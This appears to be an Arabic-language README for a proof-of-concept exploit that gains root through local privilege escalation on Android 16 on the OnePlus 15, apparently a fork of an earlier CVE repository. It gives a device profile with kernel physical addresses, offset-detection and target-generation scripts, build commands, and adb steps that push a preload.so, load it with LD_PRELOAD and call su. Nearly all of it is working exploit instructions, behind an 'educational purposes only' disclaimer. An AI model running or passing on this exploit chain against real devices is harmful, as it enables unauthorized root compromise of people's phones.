
دليل تعليمي لإثبات المفهوم لتصعيد الامتيازات المحلية على نظام أندرويد 16 لهاتف OnePlus 15، يتضمن اكتشاف إزاحات النواة، وتوليد الأهداف، وبناء الاستغلال القائم على LD_PRELOAD.
تحذير: هذا المستودع مُقدم لأغراض تعليمية وبحثية فقط. لا يتم توزيع أي ملفات ثنائية أو إصدارات مبنية مسبقًا. يجب عليك بناء كل شيء من المصدر.
تصعيد الامتيازات المحلي لنظام Android 16 على OnePlus 15.
نسخة معدلة (Fork) من x-spy/CVE-2026-43499-popsicle مع إصلاح محاذاة kallsyms وملف تعريف OnePlus 15 موثوق.
يحتوي ملف التعريف على عنوانين فيزيائيين يجب تأكيدهما من جهاز تم تجذيره (rooted) يعمل بنفس البرنامج الثابت (firmware):
{
"p0_phys_offset": "0x80000000",
"p0_kernel_phys_load": "0xc7800000"
}
الكشف التلقائي باستخدام جهاز مجذر:
python3 detect_offset.py
يتطلب Python 3 و llvm-objdump:
python3 generate_target.py \
--boot boot.img \
--profile profile_oneplus15.json \
-o source/src/target.h
make -C source clean preload
إذا لم يتم اكتشاف NDK تلقائيًا:
NDK_ROOT=/path/to/android-ndk make -C source clean preload
الناتج: source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id